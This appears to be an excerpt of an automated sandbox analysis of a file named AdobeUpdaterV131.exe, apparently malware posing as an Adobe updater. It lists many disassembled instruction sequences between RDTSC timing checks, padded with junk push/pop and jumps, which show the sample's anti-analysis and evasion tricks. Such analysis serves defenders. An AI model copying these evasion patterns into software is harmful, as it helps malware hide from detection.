Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 97DFB5 second address: 97DFE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB3h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c js 00007F09D0731CA6h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jmp 00007F09D0731CABh 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 97DFE8 second address: 97DFFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F09D0D9C3E2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 97DFFE second address: 97E002 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 97E16E second address: 97E184 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 97F3AC second address: 97F3B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 97D34B second address: 97D369 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jbe 00007F09D0D9C3D6h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 jnl 00007F09D0D9C3D6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 985B4B second address: 985B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F09D0731CA6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9968EA second address: 9968F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 998822 second address: 998845 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F09D0731CB9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 998845 second address: 99884B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 99884B second address: 998851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9A4D1F second address: 9A4D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9A4D23 second address: 9A4D2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9A4D2F second address: 9A4D56 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F09D0D9C3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F09D0D9C3E6h 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9A4D56 second address: 9A4D83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F09D0731CB9h 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 jnp 00007F09D0731CA6h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9B2552 second address: 9B256F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9B256F second address: 9B2573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9B2573 second address: 9B2577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9B119D second address: 9B11A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9B11A3 second address: 9B11C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 jl 00007F09D0D9C3FBh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F09D0D9C3E7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9B11C8 second address: 9B11CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9B12ED second address: 9B12F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9B12F1 second address: 9B130E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F09D0731CB4h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9B1475 second address: 9B1479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9B1479 second address: 9B1487 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F09D0731CAEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9B170C second address: 9B1710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9B1710 second address: 9B1722 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9B1722 second address: 9B1728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9B1886 second address: 9B189A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9B189A second address: 9B18A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9B18A0 second address: 9B18AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F09D0731CA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9B18AA second address: 9B18C4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F09D0D9C3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F09D0D9C3DCh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9B18C4 second address: 9B18E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F09D0731CB1h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9B18E1 second address: 9B18EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F09D0D9C3D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9B7111 second address: 9B711B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F09D0731CA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9C5FF9 second address: 9C601D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F09D0D9C3E9h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9CD277 second address: 9CD27D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9D1B35 second address: 9D1B3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9D1B3F second address: 9D1B5B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F09D0731CB6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9D19D3 second address: 9D19D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9D19D7 second address: 9D19F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F09D0731CAFh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9D19F3 second address: 9D1A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F09D0D9C3E2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9CAFD1 second address: 9CAFD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9CAFD7 second address: 9CAFDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9CAFDD second address: 9CAFE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9CAFE1 second address: 9CAFF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jp 00007F09D0D9C3D6h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 9CAFF3 second address: 9CAFFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: A05475 second address: A0547B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: A0547B second address: A0549A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: A0549A second address: A054A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: A054A0 second address: A054A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: A042E4 second address: A042EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: A04443 second address: A04474 instructions: 0x00000000 rdtsc 0x00000002 js 00007F09D0731CA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jc 00007F09D0731CA6h 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 pop edi 0x00000017 pushad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e pop eax 0x0000001f popad 0x00000020 push edx 0x00000021 jmp 00007F09D0731CABh 0x00000026 pop edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a pop eax 0x0000002b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: A0472C second address: A04733 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: A04733 second address: A04762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F09D0731CB2h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F09D0731CA8h 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 push edi 0x00000021 pop edi 0x00000022 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: A04762 second address: A04785 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F09D0D9C3D6h 0x00000008 jmp 00007F09D0D9C3E9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: A04785 second address: A0479E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0731CB5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: A04D63 second address: A04D68 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: A09AC1 second address: A09ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F09D0731CA6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E806F1 second address: 4E80704 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E80704 second address: 4E80790 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F09D0731CB1h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F09D0731CAEh 0x00000015 mov ebp, esp 0x00000017 jmp 00007F09D0731CB0h 0x0000001c pop ebp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F09D0731CAEh 0x00000024 sub ecx, 7FA82498h 0x0000002a jmp 00007F09D0731CABh 0x0000002f popfd 0x00000030 pushad 0x00000031 jmp 00007F09D0731CB6h 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E50DA1 second address: 4E50DA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E50DA7 second address: 4E50DDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F09D0731CACh 0x00000009 add eax, 213840E8h 0x0000000f jmp 00007F09D0731CABh 0x00000014 popfd 0x00000015 movzx ecx, bx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov di, EE30h 0x00000023 mov edx, 77FCBD5Ch 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E50DDD second address: 4E50DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0D9C3E1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E50DF2 second address: 4E50E30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F09D0731CADh 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F09D0731CACh 0x00000019 or cx, 38D8h 0x0000001e jmp 00007F09D0731CABh 0x00000023 popfd 0x00000024 push eax 0x00000025 push edx 0x00000026 mov di, ax 0x00000029 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E50E30 second address: 4E50E52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F09D0D9C3E6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E50E52 second address: 4E50E58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E50E58 second address: 4E50E5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EC07D3 second address: 4EC07E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov cx, B715h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EC07E4 second address: 4EC07EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EC07EA second address: 4EC0839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c pushad 0x0000000d call 00007F09D0731CB9h 0x00000012 pop ecx 0x00000013 jmp 00007F09D0731CB1h 0x00000018 popad 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F09D0731CAFh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EC0839 second address: 4EC0856 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EC0856 second address: 4EC08A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F09D0731CB3h 0x00000013 adc ecx, 2DDE44FEh 0x00000019 jmp 00007F09D0731CB9h 0x0000001e popfd 0x0000001f movzx ecx, bx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E50ACB second address: 4E50B6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 movzx ecx, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esp 0x0000000d jmp 00007F09D0D9C3E2h 0x00000012 mov dword ptr [esp], ebp 0x00000015 pushad 0x00000016 call 00007F09D0D9C3DEh 0x0000001b pushfd 0x0000001c jmp 00007F09D0D9C3E2h 0x00000021 adc ax, C958h 0x00000026 jmp 00007F09D0D9C3DBh 0x0000002b popfd 0x0000002c pop ecx 0x0000002d pushfd 0x0000002e jmp 00007F09D0D9C3E9h 0x00000033 add ecx, 0B079CF6h 0x00000039 jmp 00007F09D0D9C3E1h 0x0000003e popfd 0x0000003f popad 0x00000040 mov ebp, esp 0x00000042 jmp 00007F09D0D9C3DEh 0x00000047 push dword ptr [ebp+04h] 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d push edx 0x0000004e pop esi 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EC055B second address: 4EC0597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push ecx 0x00000007 jmp 00007F09D0731CB2h 0x0000000c mov dword ptr [esp], ebp 0x0000000f jmp 00007F09D0731CB0h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F09D0731CAAh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EC0597 second address: 4EC059B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EC059B second address: 4EC05A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EC05A1 second address: 4EC05B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0D9C3DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EC05B2 second address: 4EC05D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F09D0731CADh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E90B19 second address: 4E90B29 instructions: 0x00000000 rdtsc 0x00000002 mov ah, dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b movsx ebx, cx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E90B29 second address: 4E90B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4E90B2E second address: 4E90B5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F09D0D9C3DCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	RDTSC instruction interceptor: First address: 4EC062A second address: 4EC066E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F09D0731CAFh 0x00000008 jmp 00007F09D0731CB8h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 call 00007F09D0731CADh 0x0000001b pop esi 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
